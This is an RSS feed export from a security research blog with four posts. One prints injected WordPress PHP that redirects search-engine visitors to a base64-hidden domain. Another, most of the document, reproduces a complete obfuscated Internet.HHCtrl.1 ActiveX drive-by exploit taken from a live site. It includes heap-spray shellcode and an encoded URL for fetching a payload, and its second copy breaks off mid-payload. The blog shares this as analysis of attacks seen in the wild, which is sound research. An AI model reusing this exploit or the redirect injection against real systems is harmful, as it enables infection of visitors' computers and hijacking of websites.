<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule"
>

<channel>
	<title>Zeroday 01100100011010010 &#187; Vulnerabilities</title>
	<atom:link href="http://blogs.law.harvard.edu/zeroday/category/vulnerabilities/feed/" rel="self" type="application/rss+xml" />
	<link>http://blogs.law.harvard.edu/zeroday</link>
	<description>三一三三七</description>
	<lastBuildDate>Sat, 03 Oct 2009 03:11:03 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
		<item>
		<title>Wordpress 2.5.0 and 2.5.1 vulnerable to attack</title>
		<link>http://blogs.law.harvard.edu/zeroday/2008/06/08/wordpress-250-and-251-vulnerable-to-attack/</link>
		<comments>http://blogs.law.harvard.edu/zeroday/2008/06/08/wordpress-250-and-251-vulnerable-to-attack/#comments</comments>
		<pubDate>Sun, 08 Jun 2008 21:54:19 +0000</pubDate>
		<dc:creator>zeroday</dc:creator>
				<category><![CDATA[Digital Warfare]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://blogs.law.harvard.edu/zeroday/2008/06/08/wordpress-250-and-251-vulnerable-to-a</guid>
		<description><![CDATA[Thanks to co-author Brandon Palmen for the heads up to a Wordpress hack in progress.  The attackers are using a few obfuscation tricks to inject code into Wordpress installations using a recently announced vulnerability.  More details in a well written write up here.  
The code snippets from a digitalpoint.com forum are shown [...]]]></description>
			<content:encoded><![CDATA[<p>Thanks to co-author <a href="http://cyber.law.harvard.edu/people/bpalmen">Brandon Palmen</a> for the heads up to a Wordpress hack in progress.  The attackers are using a few obfuscation tricks to inject code into Wordpress installations using a recently announced vulnerability.  More details in a well written <a href="http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/">write up</a> here.  </p>
<p>The code snippets from <a href="http://forums.digitalpoint.com/showthread.php?t=874041">a digitalpoint.com forum</a> are shown using base64 encoding to hide the true destination:</p>
<p><code><br />
&lt;php&gt;<br />
                $seref=array(&quot;google&quot;,&quot;msn&quot;,<br />
                &quot;live&quot;,&quot;altavista&quot;,&quot;ask&quot;,<br />
                &quot;yahoo&quot;,&quot;aol&quot;,&quot;cnn&quot;,<br />
                &quot;weather&quot;,&quot;alexa&quot;);</p>
<p>$ser=0;<br />
foreach($seref as $ref)    </p>
<p>     if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)<br />
     { $ser=&quot;1&quot;; break; }</p>
<p>     if($ser==&quot;1&quot; &amp;&amp; sizeof($_COOKIE)==0)<br />
     {<br />
              header(&quot;Location:http://&quot; .   base64_decode(&quot;YW55cmVzdWx0cy5uZXQ=&quot;) . &quot;/&quot;);<br />
              exit;<br />
      }<br />
      &gt;&lt;/php&gt;<br />
</code></p>
<p>This code shows yet another trend we&#8217;ve noticed at&nbsp;<a href="http://stopbadware.org" title="http://stopbadware. " target="_blank">stopbadware.org</a> of only exploiting those requests which come directly from a search engine.  We can only conclude this is to prevent (or delay) detection and maximize infection duration.</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.law.harvard.edu/zeroday/2008/06/08/wordpress-250-and-251-vulnerable-to-attack/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
	</item>
		<item>
		<title>Top 2007 Symantec Vulnerabilities</title>
		<link>http://blogs.law.harvard.edu/zeroday/2008/01/02/top-2007-symantec-vulnerabilities/</link>
		<comments>http://blogs.law.harvard.edu/zeroday/2008/01/02/top-2007-symantec-vulnerabilities/#comments</comments>
		<pubDate>Wed, 02 Jan 2008 19:01:00 +0000</pubDate>
		<dc:creator>zeroday</dc:creator>
				<category><![CDATA[Digital Warfare]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://blogs.law.harvard.edu/zeroday/2008/01/02/top-2007-symantec-vulnerabilities/</guid>
		<description><![CDATA[
MAY 25, 2006 &#124; EEye Digital Security revealed this afternoon a software vulnerability inside Symantec&#8217;s Anti-Virus Corporate Edition 10.0.
The vulnerability warning, posted on the vendor&#8217;s Upcoming Advisories page, requires no user intervention and could be used to create a worm. A Symantec representative told Dark Reading that eEye notified Symantec of the problem today and [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.darkreading.com/document.asp?doc_id=95787&amp;print=true"><br />
MAY 25, 2006 | EEye Digital Security revealed this afternoon a software vulnerability inside Symantec&#8217;s Anti-Virus Corporate Edition 10.0.</a></p>
<p><a href="http://www.eeye.com/html/research/upcoming/index.html">The vulnerability warning, posted on the vendor&#8217;s Upcoming Advisories page, requires no user intervention and could be used to create a worm. A Symantec representative told Dark Reading that eEye notified Symantec of the problem today and it is investigating the issue.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.law.harvard.edu/zeroday/2008/01/02/top-2007-symantec-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
	</item>
		<item>
		<title>Great Reading List on Web Exploits</title>
		<link>http://blogs.law.harvard.edu/zeroday/2007/05/09/great-reading-list-on-web-exploits/</link>
		<comments>http://blogs.law.harvard.edu/zeroday/2007/05/09/great-reading-list-on-web-exploits/#comments</comments>
		<pubDate>Thu, 10 May 2007 01:24:48 +0000</pubDate>
		<dc:creator>zeroday</dc:creator>
				<category><![CDATA[Vulnerabilities]]></category>
		<category><![CDATA[spyware]]></category>

		<guid isPermaLink="false">http://blogs.law.harvard.edu/zeroday/2007/05/09/great-reading-list-on-web-exploits/</guid>
		<description><![CDATA[I was reading up on inet-lux and found a great blog post in spanish which provides a must read references list.  I ended up here reading about a java based botnet tool I found while researching appeals today.  I hope to have more on that later but have not had time to decompile [...]]]></description>
			<content:encoded><![CDATA[<p>I was reading up on inet-lux and found a <a href="http://translate.google.com/translate?hl=en&amp;sl=ru&amp;u=http://forum.pro-hack.ru/index.php%3Fact%3DPrint%26client%3Dprinter%26f%3D15%26t%3D1636&amp;sa=X&amp;oi=translate&amp;resnum=3&amp;ct=result&amp;prev=/search%3Fq%3Dinet-lux%26hl%3Den%26lr%3D%26sa%3DG">great blog post</a> in spanish which provides a must read references list.  I ended up here reading about a java based botnet tool I found while researching appeals today.  I hope to have more on that later but have not had time to decompile it.  Anyone want to donate an IDA Pro license?</p>
<p>[1]:<br />Microsoft Security Bulletin MS06-014<br />Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)<br />http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx</p>
<p>Microsoft Security Bulletin MS03-011<br />Flaw in Microsoft VM Could Enable Compromise System (816093)<br />http://www.microsoft.com/technet/security/bulletin/ms03-011.mspx</p>
<p>Microsoft Internet Explorer Javascript Window () Vulnerability:<br />Microsoft Security Bulletin MS05-054<br />Cumulative Security for Update Internet Explorer (905915)<br />http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx</p>
<p>Microsoft Security Bulletin MS06-006<br />Vulnerability in Windows Average Player Plug-in with Non-Microsoft Internet<br />Browsers Could Allow Remote Code Execution (911564)<br />http://www.microsoft.com/technet/security/bulletin/ms06-006.mspx</p>
<p>Mozilla Foundation Security Advisory 2005-50<br />Exploitable crash in&nbsp;<a href="http://InstallVersion.com" title="http://InstallVersion. " target="_blank">InstallVersion.com</a> pareTo (Firefox, Mozilla Suite)<br />http://www.mozilla.org/security/announce/2005/mfsa2005-50.html</p>
<p>Microsoft Security Advisory (917077)<br />Vulnerability in the way HTML Objects Handle Unexpected Method Calls Could Allow Remote Code Execution<br />http://www.microsoft.com/technet/security/advisory/917077.mspx</p>
<p>Microsoft Security Bulletin MS06-006<br />Vulnerability in Windows Average Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564)<br />http://www.microsoft.com/technet/security/Bulletin/MS06-006.mspx</p>
<p>IE ms-its: and mk: @MSITStore: vulnerability:<br />Microsoft Security Bulletin MS04-013<br />Cumulative Security for Update Outlook Express (837009)<br />http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx</p>
<p>- [2]:<br />http://www.enciclopediavirus.com/virus/vervirus.php?id=3456</p>
<p>Source:&nbsp;<a href="http://www.rzw.com.ar" title="http://www.rzw.com.ar" target="_blank">http://www.rzw.com.ar</a><br />___</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.law.harvard.edu/zeroday/2007/05/09/great-reading-list-on-web-exploits/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
	</item>
		<item>
		<title>Internet.HHCtrl.1 Exploit</title>
		<link>http://blogs.law.harvard.edu/zeroday/2006/12/24/internethhctrl1-exploit/</link>
		<comments>http://blogs.law.harvard.edu/zeroday/2006/12/24/internethhctrl1-exploit/#comments</comments>
		<pubDate>Sun, 24 Dec 2006 14:22:51 +0000</pubDate>
		<dc:creator>zeroday</dc:creator>
				<category><![CDATA[Digital Warfare]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://blogs.law.harvard.edu/zeroday/2006/12/24/internethhctrl1-exploit/</guid>
		<description><![CDATA[I&#8217;ve enclosed the code in a text box to make reading it a little easier.  This code was found on a live site that is using the exploit via iframes to infect drive by downloaders.  Extra br tags are a result of the blog software&#8230;.

&#60;script&#62;
t=&#8221;60,83,67,82,73,80,84,32,108,97,110,103,117,97,103,101,61,74,97,118,97,83,99,114,105,112,116,62,104,72,72,67,116,114,108,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,73,110,116,101,114,110,101,116,46,72,72,67,116,114,108,46,49,34,41,59,13,10,118,97,114,32,101,118,105,108,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,34,41,59,13,10,118,97,114,32,73,109,97,103,101,115,32,61,32,34,65,99,116,105,118,101,88,46,34,32,43,32,101,118,105,108,32,43,32,34,82,116,108,65,108,108,111,99,97,116,101,72,101,97,112,82,116,108,67,114,101,97,116,101,72,101,97,112,34,59,13,10,118,97,114,32,99,111,117,110,116,32,61,32,48,59,118,97,114,32,109,97,120,99,111,117,110,116,32,61,32,49,48,59,102,117,110,99,116,105,111,110,32,67,108,105,99,107,84,111,40,41,123,32,104,72,72,67,116,114,108,46,73,109,97,103,101,32,61,32,73,109,97,103,101,115,59,125,13,10,102,117,110,99,116,105,111,110,32,71,111,116,73,116,40,41,123,32,99,111,117,110,116,43,43,59,32,105,102,40,99,111,117,110,116,32,60,32,109,97,120,99,111,117,110,116,41,32,123,32,32,120,46,111,110,99,108,105,99,107,40,41,59,32,32,71,111,116,73,116,40,41,59,32,125,125,13,10,102,117,110,99,116,105,111,110,32,66,117,105,108,100,67,111,110,116,101,120,116,40,41,123,32,112,97,121,108,111,97,100,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,54,48,57,48,37,117,49,55,101,98,37,117,54,52,53,101,37,117,51,48,97,49,37,117,48,48,48,48,37,117,48,53,48,48,37,117,48,56,48,48,37,117,48,48,48,48,37,117,102,56,56,98,37,117,48,48,98,57,37,117,48,48,48,52,37,117,102,51,48,48,37,117,102,102,97,52,37,117,101,56,101,48,37,117,102,102,101,52,37,117,102,102,102,102,37,117,97,49,54,52,37,117,48,48,51,48,37,117,48,48,48,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,55,48,37,117,101,99,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,101,99,56,98,37,117,101,56,98,98,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,48,51,37,117,48,102,99,48,37,117,98,98,56,53,37,117,48,48,48,48,37,117,102,102,48,48,37,117,101,57,48,51,37,117,48,50,50,49,37,117,48,48,48,48,37,117,56,57,53,98,37,117,50,48,53,100,37,117,54,56,53,54,37,117,102,101,57,56,37,117,48,101,56,97,37,117,98,49,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,99,52,53,37,117,54,56,53,54,37,117,52,101,56,101,37,117,101,99,48,101,37,117,97,51,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,52,52,53,37,117,54,56,53,54,37,117,55,57,99,49,37,117,98,56,101,53,37,117,57,53,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,99,52,53,37,117,54,56,53,54,37,117,99,54,49,98,37,117,55,57,52,54,37,117,56,55,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,48,52,53,37,117,54,56,53,54,37,117,102,99,97,97,37,117,55,99,48,100,37,117,55,57,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,56,52,53,37,117,54,56,53,54,37,117,56,52,101,55,37,117,98,52,54,57,37,117,54,98,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,52,52,53,37,117,101,48,98,98,37,117,48,50,48,102,37,117,56,57,48,48,37,117,51,51,48,51,37,117,99,55,102,54,37,117,50,56,52,53,37,117,53,50,53,53,37,117,52,100,52,99,37,117,52,53,99,55,37,117,52,102,50,99,37,117,48,48,52,101,37,117,56,100,48,48,37,117,50,56,53,100,37,117,102,102,53,51,37,117,48,52,53,53,37,117,54,56,53,48,37,117,49,97,51,54,37,117,55,48,50,102,37,117,51,102,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,50,52,52,53,37,117,55,102,54,97,37,117,53,100,56,100,37,117,53,51,50,56,37,117,53,53,102,102,37,117,99,55,49,99,37,117,48,53,52,52,37,117,53,99,50,56,37,117,54,53,50,101,37,117,99,55,55,56,37,117,48,53,52,52,37,117,54,53,50,99,37,117,48,48,48,48,37,117,53,54,48,48,37,117,56,100,53,54,37,117,50,56,55,100,37,117,102,102,53,55,37,117,50,48,55,53,37,117,102,102,53,54,37,117,50,52,53,53,37,117,53,55,53,54,37,117,53,53,102,102,37,117,101,56,48,99,37,117,48,48,54,50,37,117,48,48,48,48,37,117,99,52,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,51,51,54,49,37,117,99,50,99,48,37,117,48,48,48,52,37,117,56,98,53,53,37,117,53,49,101,99,37,117,56,98,53,51,37,117,48,56,55,100,37,117,53,100,56,98,37,117,53,54,48,99,37,117,55,51,56,98,37,117,56,98,51,99,37,117,49,101,55,52,37,117,48,51,55,56,37,117,53,54,102,51,37,117,55,54,56,98,37,117,48,51,50,48,37,117,51,51,102,51,37,117,52,57,99,57,37,117,97,100,52,49,37,117,99,51,48,51,37,117,51,51,53,54,37,117,48,102,102,54,37,117,49,48,98,101,37,117,102,50,51,97,37,117,48,56,55,52,37,117,99,101,99,49,37,117,48,51,48,100,37,117,52,48,102,50,37,117,102,49,101,98,37,117,102,101,51,98,37,117,55,53,53,101,37,117,53,97,101,53,37,117,101,98,56,98,37,117,53,97,56,98,37,117,48,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98,37,117,56,98,52,98,37,117,49,99,53,97,37,117,100,100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37,117,53,101,99,53,37,117,53,57,53,98,37,117,99,50,53,100,37,117,48,48,48,56,37,117,57,50,101,57,37,117,48,48,48,48,37,117,53,101,48,48,37,117,56,48,98,102,37,117,48,50,48,99,37,117,98,57,48,48,37,117,48,49,48,48,37,117,48,48,48,48,37,117,97,52,102,51,37,117,101,99,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,102,99,56,98,37,117,99,55,56,51,37,117,99,55,49,48,37,117,54,101,48,55,37,117,54,52,55,52,37,117,99,55,54,99,37,117,48,52,52,55,37,117,48,48,54,99,37,117,48,48,48,48,37,117,102,102,53,55,37,117,48,52,53,53,37,117,52,53,56,57,37,117,99,55,50,52,37,117,53,50,48,55,37,117,54,99,55,52,37,117,99,55,52,49,37,117,48,52,52,55,37,117,54,99,54,99,37,117,54,51,54,102,37,117,52,55,99,55,37,117,54,49,48,56,37,117,54,53,55,52,37,117,99,55,52,56,37,117,48,99,52,55,37,117,54,49,54,53,37,117,48,48,55,48,37,117,53,48,53,55,37,117,53,53,102,102,37,117,56,98,48,56,37,117,98,56,102,48,37,117,48,102,101,52,37,117,48,48,48,50,37,117,51,48,56,57,37,117,48,55,99,55,37,117,55,51,54,100,37,117,54,51,55,54,37,117,52,55,99,55,37,117,55,50,48,52,37,117,48,48,55,52,37,117,53,55,48,48,37,117,53,53,102,102,37,117,56,98,48,52,37,117,51,99,52,56,37,117,56,99,56,98,37,117,56,48,48,56,37,117,48,48,48,48,37,117,51,57,48,48,37,117,48,56,51,52,37,117,48,52,55,52,37,117,102,57,101,50,37,117,49,50,101,98,37,117,51,52,56,100,37,117,53,53,48,56,37,117,52,48,54,97,37,117,48,52,54,97,37,117,102,102,53,54,37,117,49,48,53,53,37,117,48,54,99,55,37,117,48,99,56,48,37,117,48,48,48,50,37,117,99,52,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,101,56,99,51,37,117,102,102,54,57,37,117,102,102,102,102,37,117,48,52,56,98,37,117,53,51,50,52,37,117,53,50,53,49,37,117,53,55,53,54,37,117,101,99,98,57,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,49,57,37,117,55,53,100,98,37,117,51,51,53,48,37,117,51,51,99,57,37,117,56,51,100,98,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,49,53,37,117,55,53,48,48,37,117,56,51,51,101,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,51,53,37,117,55,53,48,48,37,117,56,51,51,48,37,117,48,50,101,56,37,117,98,55,48,102,37,117,56,51,49,56,37,117,54,97,102,98,37,117,50,53,55,53,37,117,99,48,56,51,37,117,56,98,48,52,37,117,98,56,51,48,37,117,48,102,101,48,37,117,48,48,48,50,37,117,48,48,54,56,37,117,48,48,48,48,37,117,54,56,48,49,37,117,49,48,48,48,37,117,48,48,48,48,37,117,48,48,54,97,37,117,49,48,102,102,37,117,48,54,56,57,37,117,52,52,56,57,37,117,49,56,50,52,37,117,101,99,98,57,37,117,48,50,48,102,37,117,102,102,48,48,37,117,53,102,48,49,37,117,53,97,53,101,37,117,53,98,53,57,37,117,101,52,98,56,37,117,48,50,48,102,37,117,102,102,48,48,37,117,101,56,50,48,37,117,102,100,100,97,37,117,102,102,102,102,34,41,59,13,10,104,111,109,101,61,117,110,101,115,99,97,112,101,40,34,37,117,55,52,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,117,54,51,50,102,37,117,54,49,54,57,37,117,54,54,50,101,37,117,54,57,54,50,37,117,54,102,50,101,37,117,54,55,55,50,37,117,54,51,50,101,37,117,50,102,54,101,37,117,55,51,54,51,37,117,50,101,54,101,37,117,55,56,54,53,37,117,48,48,54,53,37,117,48,48,48,48,34,41,59,13,10,114,117,110,110,97,98,108,101,32,61,32,112,97,121,108,111,97,100,43,104,111,109,101,59,32,115,107,105,112,112,101,114,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,56,52,56,37,117,52,56,52,56,34,41,59,13,10,119,104,105,108,101,32,40,115,107,105,112,112,101,114,46,108,101,110,103,116,104,60,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,32,123,32,32,115,107,105,112,112,101,114,43,61,115,107,105,112,112,101,114,59,32,125,13,10,115,107,105,112,112,101,114,49,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,115,107,105,112,112,101,114,50,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,107,105,112,112,101,114,46,108,101,110,103,116,104,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,119,104,105,108,101,40,115,107,105,112,112,101,114,50,46,108,101,110,103,116,104,60,40,48,120,52,48,48,48,48,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,41,32,123,32,32,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,50,59,13,10,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,49,59,32,125,32,99,111,110,116,101,120,116,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,32,105,105,61,45,49,59,32,119,104,105,108,101,40,43,43,105,105,60,51,48,48,41,13,10,123,32,32,99,111,110,116,101,120,116,91,105,105,93,32,61,32,115,107,105,112,112,101,114,50,32,43,32,114,117,110,110,97,98,108,101,59,32,125,32,71,111,116,73,116,40,41,59,125,102,117,110,99,116,105,111,110,32,116,101,115,116,40,41,123,32,97,108,101,114,116,40,41,59,125,60,47,83,67,82,73,80,84,62&#8243;
t=eval(&#8221;String.fromCharCode(&#8221;+t+&#8221;)&#8221;);
document.write(t);
&#60;/script&#62;
&#60;/HEAD&#62;&#60;BODY onload=BuildContext();&#62;
&#60;BUTTON id=x onclick=ClickTo();&#62;
&#60;/BUTTON&#62;

]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve enclosed the code in a text box to make reading it a little easier.  This code was found on a live site that is using the exploit via iframes to infect drive by downloaders.  Extra br tags are a result of the blog software&#8230;.</p>
<p><textarea name="exploit" rows="10" cols="50"><br />
&lt;script&gt;<br />
t=&#8221;60,83,67,82,73,80,84,32,108,97,110,103,117,97,103,101,61,74,97,118,97,83,99,114,105,112,116,62,104,72,72,67,116,114,108,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,73,110,116,101,114,110,101,116,46,72,72,67,116,114,108,46,49,34,41,59,13,10,118,97,114,32,101,118,105,108,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,34,41,59,13,10,118,97,114,32,73,109,97,103,101,115,32,61,32,34,65,99,116,105,118,101,88,46,34,32,43,32,101,118,105,108,32,43,32,34,82,116,108,65,108,108,111,99,97,116,101,72,101,97,112,82,116,108,67,114,101,97,116,101,72,101,97,112,34,59,13,10,118,97,114,32,99,111,117,110,116,32,61,32,48,59,118,97,114,32,109,97,120,99,111,117,110,116,32,61,32,49,48,59,102,117,110,99,116,105,111,110,32,67,108,105,99,107,84,111,40,41,123,32,104,72,72,67,116,114,108,46,73,109,97,103,101,32,61,32,73,109,97,103,101,115,59,125,13,10,102,117,110,99,116,105,111,110,32,71,111,116,73,116,40,41,123,32,99,111,117,110,116,43,43,59,32,105,102,40,99,111,117,110,116,32,60,32,109,97,120,99,111,117,110,116,41,32,123,32,32,120,46,111,110,99,108,105,99,107,40,41,59,32,32,71,111,116,73,116,40,41,59,32,125,125,13,10,102,117,110,99,116,105,111,110,32,66,117,105,108,100,67,111,110,116,101,120,116,40,41,123,32,112,97,121,108,111,97,100,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,54,48,57,48,37,117,49,55,101,98,37,117,54,52,53,101,37,117,51,48,97,49,37,117,48,48,48,48,37,117,48,53,48,48,37,117,48,56,48,48,37,117,48,48,48,48,37,117,102,56,56,98,37,117,48,48,98,57,37,117,48,48,48,52,37,117,102,51,48,48,37,117,102,102,97,52,37,117,101,56,101,48,37,117,102,102,101,52,37,117,102,102,102,102,37,117,97,49,54,52,37,117,48,48,51,48,37,117,48,48,48,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,55,48,37,117,101,99,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,101,99,56,98,37,117,101,56,98,98,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,48,51,37,117,48,102,99,48,37,117,98,98,56,53,37,117,48,48,48,48,37,117,102,102,48,48,37,117,101,57,48,51,37,117,48,50,50,49,37,117,48,48,48,48,37,117,56,57,53,98,37,117,50,48,53,100,37,117,54,56,53,54,37,117,102,101,57,56,37,117,48,101,56,97,37,117,98,49,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,99,52,53,37,117,54,56,53,54,37,117,52,101,56,101,37,117,101,99,48,101,37,117,97,51,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,52,52,53,37,117,54,56,53,54,37,117,55,57,99,49,37,117,98,56,101,53,37,117,57,53,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,99,52,53,37,117,54,56,53,54,37,117,99,54,49,98,37,117,55,57,52,54,37,117,56,55,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,48,52,53,37,117,54,56,53,54,37,117,102,99,97,97,37,117,55,99,48,100,37,117,55,57,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,56,52,53,37,117,54,56,53,54,37,117,56,52,101,55,37,117,98,52,54,57,37,117,54,98,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,52,52,53,37,117,101,48,98,98,37,117,48,50,48,102,37,117,56,57,48,48,37,117,51,51,48,51,37,117,99,55,102,54,37,117,50,56,52,53,37,117,53,50,53,53,37,117,52,100,52,99,37,117,52,53,99,55,37,117,52,102,50,99,37,117,48,48,52,101,37,117,56,100,48,48,37,117,50,56,53,100,37,117,102,102,53,51,37,117,48,52,53,53,37,117,54,56,53,48,37,117,49,97,51,54,37,117,55,48,50,102,37,117,51,102,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,50,52,52,53,37,117,55,102,54,97,37,117,53,100,56,100,37,117,53,51,50,56,37,117,53,53,102,102,37,117,99,55,49,99,37,117,48,53,52,52,37,117,53,99,50,56,37,117,54,53,50,101,37,117,99,55,55,56,37,117,48,53,52,52,37,117,54,53,50,99,37,117,48,48,48,48,37,117,53,54,48,48,37,117,56,100,53,54,37,117,50,56,55,100,37,117,102,102,53,55,37,117,50,48,55,53,37,117,102,102,53,54,37,117,50,52,53,53,37,117,53,55,53,54,37,117,53,53,102,102,37,117,101,56,48,99,37,117,48,48,54,50,37,117,48,48,48,48,37,117,99,52,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,51,51,54,49,37,117,99,50,99,48,37,117,48,48,48,52,37,117,56,98,53,53,37,117,53,49,101,99,37,117,56,98,53,51,37,117,48,56,55,100,37,117,53,100,56,98,37,117,53,54,48,99,37,117,55,51,56,98,37,117,56,98,51,99,37,117,49,101,55,52,37,117,48,51,55,56,37,117,53,54,102,51,37,117,55,54,56,98,37,117,48,51,50,48,37,117,51,51,102,51,37,117,52,57,99,57,37,117,97,100,52,49,37,117,99,51,48,51,37,117,51,51,53,54,37,117,48,102,102,54,37,117,49,48,98,101,37,117,102,50,51,97,37,117,48,56,55,52,37,117,99,101,99,49,37,117,48,51,48,100,37,117,52,48,102,50,37,117,102,49,101,98,37,117,102,101,51,98,37,117,55,53,53,101,37,117,53,97,101,53,37,117,101,98,56,98,37,117,53,97,56,98,37,117,48,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98,37,117,56,98,52,98,37,117,49,99,53,97,37,117,100,100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37,117,53,101,99,53,37,117,53,57,53,98,37,117,99,50,53,100,37,117,48,48,48,56,37,117,57,50,101,57,37,117,48,48,48,48,37,117,53,101,48,48,37,117,56,48,98,102,37,117,48,50,48,99,37,117,98,57,48,48,37,117,48,49,48,48,37,117,48,48,48,48,37,117,97,52,102,51,37,117,101,99,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,102,99,56,98,37,117,99,55,56,51,37,117,99,55,49,48,37,117,54,101,48,55,37,117,54,52,55,52,37,117,99,55,54,99,37,117,48,52,52,55,37,117,48,48,54,99,37,117,48,48,48,48,37,117,102,102,53,55,37,117,48,52,53,53,37,117,52,53,56,57,37,117,99,55,50,52,37,117,53,50,48,55,37,117,54,99,55,52,37,117,99,55,52,49,37,117,48,52,52,55,37,117,54,99,54,99,37,117,54,51,54,102,37,117,52,55,99,55,37,117,54,49,48,56,37,117,54,53,55,52,37,117,99,55,52,56,37,117,48,99,52,55,37,117,54,49,54,53,37,117,48,48,55,48,37,117,53,48,53,55,37,117,53,53,102,102,37,117,56,98,48,56,37,117,98,56,102,48,37,117,48,102,101,52,37,117,48,48,48,50,37,117,51,48,56,57,37,117,48,55,99,55,37,117,55,51,54,100,37,117,54,51,55,54,37,117,52,55,99,55,37,117,55,50,48,52,37,117,48,48,55,52,37,117,53,55,48,48,37,117,53,53,102,102,37,117,56,98,48,52,37,117,51,99,52,56,37,117,56,99,56,98,37,117,56,48,48,56,37,117,48,48,48,48,37,117,51,57,48,48,37,117,48,56,51,52,37,117,48,52,55,52,37,117,102,57,101,50,37,117,49,50,101,98,37,117,51,52,56,100,37,117,53,53,48,56,37,117,52,48,54,97,37,117,48,52,54,97,37,117,102,102,53,54,37,117,49,48,53,53,37,117,48,54,99,55,37,117,48,99,56,48,37,117,48,48,48,50,37,117,99,52,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,101,56,99,51,37,117,102,102,54,57,37,117,102,102,102,102,37,117,48,52,56,98,3